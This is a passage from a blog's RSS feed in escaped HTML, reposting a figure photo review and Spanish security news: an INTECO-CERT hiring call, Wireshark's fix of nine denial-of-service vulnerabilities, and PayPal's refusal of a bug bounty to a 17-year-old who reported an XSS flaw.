src="http://farm4.staticflickr.com/3814/8919174777_82c5c46b89_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172024"&gt;&lt;img alt="8919791988_7544c986b6_o" height="930" src="http://farm4.staticflickr.com/3757/8919791988_7544c986b6_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172025"&gt;&lt;img alt="8919792594_a0e8a332d3_o" height="523" src="http://farm8.staticflickr.com/7297/8919792594_a0e8a332d3_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172026"&gt;&lt;img alt="8919793444_209d5c82e9_o" height="523" src="http://farm9.staticflickr.com/8130/8919793444_209d5c82e9_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172027"&gt;&lt;img alt="8919177303_ef8419fd0b_o" height="523" src="http://farm8.staticflickr.com/7284/8919177303_ef8419fd0b_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172028"&gt;&lt;img alt="8919795066_58a26f5256_o" height="523" src="http://farm6.staticflickr.com/5347/8919795066_58a26f5256_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Something I discovered of late is that placing figures on glass with a light source from below helps bring out the details.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172029"&gt;&lt;img alt="8919795756_aa165a0e3d_o" height="930" src="http://farm8.staticflickr.com/7307/8919795756_aa165a0e3d_o.jpg" width="523" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172030"&gt;&lt;img alt="8919179739_07dd64f566_o" height="523" src="http://farm4.staticflickr.com/3671/8919179739_07dd64f566_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172031"&gt;&lt;img alt="8919796928_be8626cce5_o" height="523" src="http://farm3.staticflickr.com/2825/8919796928_be8626cce5_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172032"&gt;&lt;img alt="8919181033_2d8945fbe6_o" height="523" src="http://farm8.staticflickr.com/7394/8919181033_2d8945fbe6_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;Yui with other Muv-Luv girls around the office.&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172033"&gt;&lt;img alt="8919798124_ae786979cc_o" height="523" src="http://farm4.staticflickr.com/3721/8919798124_ae786979cc_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;More figure photo reviews listed up below.&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26957/Smart+Doll.html"&gt;Smart Doll&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26942/Cryska+Barchenowa+UN+Force+Easy+Jacket.html"&gt;Cryska Barchenowa UN Force Easy Jacket&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26934/Lamp+Miku.html"&gt;Lamp Miku&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26940/Dark+Magician+Girl.html"&gt;Dark Magician Girl&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26937/Kaiyodo+Office+Tour.html"&gt;Kaiyodo Office Tour&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26936/Volks.html"&gt;Volks&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26928/Mirai+Suenaga+Doll.html"&gt;Mirai Suenaga Doll&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26895/Asuka+Shikinami+Langley+Kotobukiya.html"&gt;Asuka Shikinami Langley Kotobukiya&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26922/Dollpa+29+Part+2.html"&gt;Dollpa 29 Part 2&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/post/26923/Dollpa+29.html"&gt;Dollpa 29&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;li&gt;&lt;a href="http://www.dannychoo.com/en/posts/category/figures/landscape"&gt;View more&lt;/a&gt;&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;&lt;a href="http://www.dannychoo.com/en/post/26941/Yui+Takamura+Off+Style+Ver.html#image_172034"&gt;&lt;img alt="8919182313_4472c1268e_o" height="429" src="http://farm9.staticflickr.com/8130/8919182313_4472c1268e_o.jpg" width="930" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a href="http://mirai.fm/"&gt;Find out more about the Culture Japan girls &amp;gt;&amp;gt;&amp;gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/yui-takamura-off-style-ver.html</link><author>noreply@blogger.com (El Bio Gamer)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-1602565211959108522</guid><pubDate>Thu, 20 Jun 2013 15:25:00 +0000</pubDate><atom:updated>2013-06-20T10:25:40.275-05:00</atom:updated><title>Se buscan expertos en ciberseguridad</title><description>&lt;a href="http://feedproxy.google.com/~r/SecurityByDefault/~3/-2e2LmrOLZA/se-buscan-expertos-en-ciberseguridad.html"&gt;Se buscan expertos en ciberseguridad&lt;/a&gt;: &lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-Myk0es8L3FU/UZvDZNKDYmI/AAAAAAAAAPM/SFYQF48kXFs/s1600/cybersec.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="179" src="http://4.bp.blogspot.com/-Myk0es8L3FU/UZvDZNKDYmI/AAAAAAAAAPM/SFYQF48kXFs/s320/cybersec.jpg" width="320" /&gt;&lt;/a&gt;A estas alturas de la película a nadie le sorprende que los distintos estados a nivel internacional estén &lt;b&gt;buscando refuerzos&lt;/b&gt; en sus capacidades de reacción frente a amenazas en la red de manera que las infraestructuras tecnológicas sobre las que se apoyan las comunicaciones, tecnologías así como los sectores estratégicos e infraestructuras críticas, cuenten con medios tecnológicos y humanos suficientes de cara a garantizar la persistencia de los sistemas y la operativa convencional de los mismos.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Desde casos de incidentes, ataques y amenazas relacionados con las infraestructuras críticas como Stuxnet (2010), Duqu (2011), o Flame (2012), hasta el más actual &lt;a href="http://www.inteco.es/blogs/post/Seguridad/BlogSeguridad/Articulo_y_comentarios/octubre_rojo"&gt;Rocra&lt;/a&gt; (2013), dirigido al robo de información crítica y sensible de organizaciones gubernamentales de diferentes países, &lt;b&gt;la evolución de las amenazas hacia ataques más dirigidos (APTs) se constata.&lt;/b&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Pero no sólo las grandes organizaciones o instituciones gubernamentales se encuentran en situación de peligro, los ciudadanos también son objetivo. Prueba de ello fue la infección masiva producida por la familia de virus &lt;a href="http://www.securitybydefault.com/2013/04/tres-grandes-amigos-blackhole.html"&gt;&lt;i&gt;Ransomware&lt;/i&gt;&lt;/a&gt;, conocido también como virus de la Policía, que ha afectado (y aún afecta) a numerosos usuarios en todo el mundo. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;En el caso de España, &lt;b&gt;en INTECO-CERT hemos afianzado nuestra posición como actor clave en la gestión y respuesta frente a este tipo de amenazas&lt;/b&gt; y, conscientes de la necesidad de potenciar las capacidades de detección y reacción, hemos puesto en marcha el &lt;b&gt;Centro de Inteligencia en Ciberseguridad&lt;/b&gt;. Seguro que más de uno se pregunta, bien pero &lt;i&gt;¿Qué se hace en este centro?&lt;/i&gt; Actualmente llevamos a cabo distintos tipos de tareas relacionadas con el análisis de malware, forense, gestión de incidentes y amenazas, desarrollo y despliegue de herramientas de detección, monitorización y análisis, así como otras actuaciones con alta carga de investigación e innovación. &lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;El objetivo es claro: &lt;b&gt;detectar, anticiparse y reaccionar&lt;/b&gt;, en la medida de lo posible, &lt;b&gt;ante los miles de ataques que diariamente sufrimos ciudadanos, empresas y todo tipo de organizaciones&lt;/b&gt;. Y todo en colaboración con distintos equipos de seguridad tanto internacional como nacional, y para muestra un botón; el informe que hemos publicado esta semana junto con &lt;a href="http://www.csirtcv.gva.es/"&gt;CSIRT-CV&lt;/a&gt; y titulado “&lt;a href="http://cert.inteco.es/extfrontinteco/img/File/intecocert/EstudiosInformes/deteccion_apt.pdf"&gt;Detección de APTs&lt;/a&gt;” .&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Como no podía ser de otra manera, y fruto tanto de nuestra misión, como de las necesidades de protección nacional que se ponen de manifiesto, en INTECO &lt;b&gt;buscamos ampliar plantilla con 20 profesionales altamente cualificados en el ámbito de la Ciberseguridad&lt;/b&gt;. Para no descartar a nadie únicamente por su CV, la selección que se hará desde INTECO &lt;b&gt;se basará en una primera prueba de conocimiento &lt;i&gt;online&lt;/i&gt; donde todos los candidatos tendrán la posibilidad de demostrar sus &lt;i&gt;skills&lt;/i&gt; técnicos &lt;/b&gt;en distintas áreas de especialización (Computer forensics, Análisis de malware, Análisis de vulnerabilidades e Incident handling). Los salarios serán competitivos en función de la valía del candidato, por lo que, para todos aquellos que estéis buscando algo de estas características, solo os queda demostrar lo que sabéis...&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Aquí os dejamos los enlaces de la oferta:&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;+&amp;nbsp;&lt;a href="http://www.inteco.es/announcement/convocatorias/Empleo/tecnico_experto_ciberseguridad"&gt;http://www.inteco.es/announcement/convocatorias/Empleo/tecnico_experto_ciberseguridad&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;&lt;br /&gt;+&amp;nbsp;&lt;a href="https://www.infojobs.net/leon/20-tecnicos-expertos-ciberseguridad/of-ief3994fb89495682834aedd0b26d7f"&gt;https://www.infojobs.net/leon/20-tecnicos-expertos-ciberseguridad/of-ief3994fb89495682834aedd0b26d7f&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Darle las gracias Yago, Alex, José Antonio y Lorenzo por permitirnos usar su ventana al mundo.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;br /&gt;-----------------------&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: right;"&gt;&lt;br /&gt;&lt;i&gt;Artículo cortesía de &lt;a href="https://twitter.com/DanielFirvida"&gt;Daniel Fírvida&lt;/a&gt;&lt;/i&gt;&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="https://twitter.com/albertolopezr"&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;img height="1" src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/-2e2LmrOLZA" width="1" /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/se-buscan-expertos-en-ciberseguridad.html</link><author>noreply@blogger.com (El Bio Gamer)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://4.bp.blogspot.com/-Myk0es8L3FU/UZvDZNKDYmI/AAAAAAAAAPM/SFYQF48kXFs/s72-c/cybersec.jpg" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-6245783749542996333</guid><pubDate>Thu, 20 Jun 2013 15:25:00 +0000</pubDate><atom:updated>2013-06-20T10:25:34.279-05:00</atom:updated><title>Wireshark corrige nueve vulnerabilidades</title><description>&lt;a href="http://feedproxy.google.com/~r/hispasec/zCAd/~3/FI0rmqdrn0I/wireshark-corrige-nueve-vulnerabilidades.html"&gt;Wireshark corrige nueve vulnerabilidades&lt;/a&gt;: &lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;span style="font-size: 13pt;"&gt;Se&lt;br /&gt;ha publicado &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;nueve boletines de&lt;br /&gt;seguridad para Wireshark&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt; que alertan y corrigen otras tantas&lt;br /&gt;vulnerabilidades para este software.&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://3.bp.blogspot.com/-_pbGYj3BybI/TxRpOA1s6WI/AAAAAAAAANU/uTQnaqV7NxE/s1600/logo_wireshark.png" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-_pbGYj3BybI/TxRpOA1s6WI/AAAAAAAAANU/uTQnaqV7NxE/s1600/logo_wireshark.png" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Wireshark es una aplicación de&lt;br /&gt;auditoría orientada al análisis de tráfico en redes. Su popularidad es muy&lt;br /&gt;elevada, puesto que soporta una gran cantidad de protocolos y es de fácil&lt;br /&gt;manejo. Además Wireshark es software libre (sujeto a licencia GPL) y se ejecuta&lt;br /&gt;sobre la mayoría de sistemas operativos Unix y compatibles, así como en Microsoft&lt;br /&gt;Windows.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Las nueve vulnerabilidades&lt;br /&gt;corregidas pueden ser aprovechadas para hacer que el software sufra una&lt;br /&gt;denegación de servicio, bien dejando de funcionar, bien consumiendo todos los&lt;br /&gt;recursos de la máquina.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;En escenarios en los que se estén&lt;br /&gt;monitorizando ataques de red con Wireshark, estos fallos pueden permitir al&lt;br /&gt;potencial atacante neutralizar al software antes de lanzar el ataque real y así&lt;br /&gt;pasar desapercibido.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Como es habitual, estos fallos se&lt;br /&gt;pueden aprovechar por medio de dos vectores: mediante la inyección de un código&lt;br /&gt;especialmente manipulado en la interfaz en la que el software esté analizando&lt;br /&gt;el tráfico, o por medio de un fichero de captura de tráfico y que sea procesado&lt;br /&gt;por el programa.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Los disectores vulnerables son&lt;br /&gt;los siguientes: "&lt;i&gt;GTPv2&lt;/i&gt;",&lt;br /&gt;"&lt;i&gt;ASN.1 BER&lt;/i&gt;", "&lt;i&gt;PPP CCP&lt;/i&gt;", "&lt;i&gt;DCP ETSI&lt;/i&gt;", "&lt;i&gt;MPEG DSM-CC&lt;/i&gt;", "&lt;i&gt;Websocket&lt;/i&gt;", "&lt;i&gt;MySQL&lt;/i&gt;" y "&lt;i&gt;ETCH&lt;/i&gt;" en las versiones anteriores a 1.8.7 y 1.6.15.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;b&gt;Más información:&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Wireshark Security Advisories&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="http://www.wireshark.org/security/"&gt;http://www.wireshark.org/security/&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div align="right" style="text-align: right;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div align="right" style="text-align: right;"&gt;&lt;br /&gt;Jose Ignacio Palacios&lt;br /&gt;Ortega&lt;/div&gt;&lt;br /&gt;&lt;div align="right" style="text-align: right;"&gt;&lt;br /&gt;&lt;a href="mailto:jipalacios@hispasec.com"&gt;jipalacios@hispasec.com&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;img height="1" src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/FI0rmqdrn0I" width="1" /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/wireshark-corrige-nueve-vulnerabilidades.html</link><author>noreply@blogger.com (El Bio Gamer)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://3.bp.blogspot.com/-_pbGYj3BybI/TxRpOA1s6WI/AAAAAAAAANU/uTQnaqV7NxE/s72-c/logo_wireshark.png" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-6375845527456133398</guid><pubDate>Thu, 20 Jun 2013 15:23:00 +0000</pubDate><atom:updated>2013-06-20T10:23:57.923-05:00</atom:updated><title>Paypal no paga por un fallo de seguridad descubierto por un chico de 17 años</title><description>&lt;a href="http://feedproxy.google.com/~r/hispasec/zCAd/~3/UKZYxe_i5i4/paypal-no-paga-por-un-fallo-de.html"&gt;Paypal no paga por un fallo de seguridad descubierto por un chico de 17 años&lt;/a&gt;: &lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;span style="font-size: 13pt;"&gt;Robert Kugler, un alemán de 17 años, ha descubierto &lt;/span&gt;&lt;b style="font-size: 13pt;"&gt;un grave fallo de seguridad en Paypal&lt;/b&gt;&lt;span style="font-size: 13pt;"&gt;. La empresa, lejos de recompensar al estudiante a través de su programa oficial de caza de bugs, le "&lt;/span&gt;&lt;i style="font-size: 13pt;"&gt;descalificó&lt;/i&gt;&lt;span style="font-size: 13pt;"&gt;" después de haber reportado el fallo, que finalmente ha hecho público. No es el primer desliz de Paypal con respecto a los investigadores.&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;Robert Kugler ha descubierto &lt;b&gt;un clásico problema de Cross Site Scripting en el buscador de Paypal&lt;/b&gt;. En una web de esta categoría, un XSS puede resultar extremadamente serio, puesto que permitiría a atacantes engañar a los usuarios de una manera mucho más sofisticada.&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-iYh-72_U68k/UaTiqT-zczI/AAAAAAAACkI/9Nb01xecfYI/s1600/xss-paypal.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="343" src="http://2.bp.blogspot.com/-iYh-72_U68k/UaTiqT-zczI/AAAAAAAACkI/9Nb01xecfYI/s1600/xss-paypal.png" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://picturepush.com/public/13144090"&gt;&lt;span style="font-size: x-small;"&gt;http://picturepush.com/public/13144090&lt;/span&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;Kugler quiso acogerse al programa de recompensas de Paypal, que anima a la investigación responsable de vulnerabilidades premiando económicamente a los usuarios que encuentren fallos de seguridad. Así motivan un uso responsable de las vulnerabilidades. Mozilla, Google y otros agentes externos que funcionan como intermediarios, actúan de esta forma con éxito desde que se pusiera de moda hace unos años.&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;Kluger recibió sin embargo un email afirmando que &lt;b&gt;su descubrimiento no optaba al premio por tener 17 años&lt;/b&gt;. Finalmente &lt;a href="http://seclists.org/fulldisclosure/2013/May/163"&gt;ha publicado el problema en Full Disclosure&lt;/a&gt;, quejándose de la situación. Kluger afirma que la respuesta de Paypal fue:&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;br /&gt;&lt;span lang="EN-GB"&gt;"&lt;i&gt;To be eligible for the Bug Bounty Program, you must not: ... Be less than 18 years of age. If PayPal discovers that a researcher does not meet any of the criteria above, PayPal will remove that researcher from the Bug Bounty Program and disqualify them from receiving any bounty payments.&lt;/i&gt;" &lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;Pero parece que esto le fue comunicado en privado, puesto que públicamente no se pueden encontrar fácilmente esas restricciones en ninguna página oficial de Paypal ni &lt;b&gt;parece que nunca se haya impuesto públicamente esta restricción.&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;b&gt;El investigador en desventaja&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;Poner restricciones a la entregas de premios después de haber recibido la información es una práctica que, cuando menos, coloca al investigador en desventaja. No conoce las reglas del juego completas hasta que ha enseñado sus cartas (el código vulnerable) a la compañía. Esta, que ya puede arreglar el fallo (en última instancia, es lo que les interesa), decide entonces que los menores de edad no pueden recibir un premio.&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="clear: both;"&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;a href="http://4.bp.blogspot.com/-y1O4ElA33Pk/UaTj_7f8M6I/AAAAAAAACkY/mreoq_Fv-_c/s1600/paypal_logo.PNG" style="clear: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-y1O4ElA33Pk/UaTj_7f8M6I/AAAAAAAACkY/mreoq_Fv-_c/s1600/paypal_logo.PNG" /&gt;&lt;/a&gt;Si se tratase de una cuestión legal, existen innumerables formas de sortear el inconveniente, como pedir permiso a sus tutores legales o compensar de otras formas. Pero la realidad es que se ha rechazado a la persona que encuentra un fallo que perfectamente encaja en la dinámica y reglas propuestas por Paypal, por una cuestión "&lt;i&gt;menor&lt;/i&gt;" como es la edad... y esto deja en clara desventaja al usuario y da muy mala imagen a Paypal, que &lt;b&gt;no es la primera vez que se ve criticada por otros aspirantes a la recompensa&lt;/b&gt;. Se han conocido otros problemas sufridos por investigadores para que la compañía realmente les pague por sus vulnerabilidades.&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;Otras empresas como Mozilla, &lt;a href="http://news.cnet.com/8301-17852_3-20020534-71.html"&gt;llegaron a pagar 3.000 dólares a un chico de 12 años&lt;/a&gt; por encontrar un grave fallo de seguridad en el navegador. &lt;a href="http://news.cnet.com/8301-27080_3-57369971-245/teen-finds-bugs-in-google-facebook-apple-microsoft-code/"&gt;Cim Stordal, de 15 años, ha descubierto ya fallos en Facebook, Chrome...&lt;/a&gt; y en la mayoría de los programas ha sido aceptado y recompensado.&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;El investigador de seguridad informática es habitualmente joven, y la experiencia demuestra que suele elucubrar sus mejores ideas o potenciar sus habilidades durante su adolescencia. Imponer una restricción de edad como si la "inmadurez legal" fuese un obstáculo técnico en el mundo de la seguridad, no puede más que interpretarse como una excusa por parte de la compañía y una puesta en evidencia de un programa de recompensas que, si bien ha resultado una buena idea en general para todas las empresas que lo han puesto en marcha, Paypal en concreto parece gestionar de forma discutible. O al menos, no parece que le esté otorgando el rédito en buena imagen que, como efecto colateral, también se busca con estas iniciativas.&lt;/div&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;b&gt;Más información:&lt;/b&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;La caza de bugs en Paypal acaba con la publicación de un grave agujero de seguridad&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="http://unaaldia.hispasec.com/2012/11/la-caza-de-bugs-en-paypal-acaba-con-la.html"&gt;http://unaaldia.hispasec.com/2012/11/la-caza-de-bugs-en-paypal-acaba-con-la.html&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;span lang="EN-GB"&gt;PayPal.com XSS Vulnerability&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="http://seclists.org/fulldisclosure/2013/May/163"&gt;&lt;span lang="EN-GB"&gt;http://seclists.org/fulldisclosure/2013/May/163&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;span lang="EN-GB"&gt;Boy bug hunter nabs $3,000 from Mozilla&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="http://news.cnet.com/8301-17852_3-20020534-71.html"&gt;&lt;span lang="EN-GB"&gt;http://news.cnet.com/8301-17852_3-20020534-71.html&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br 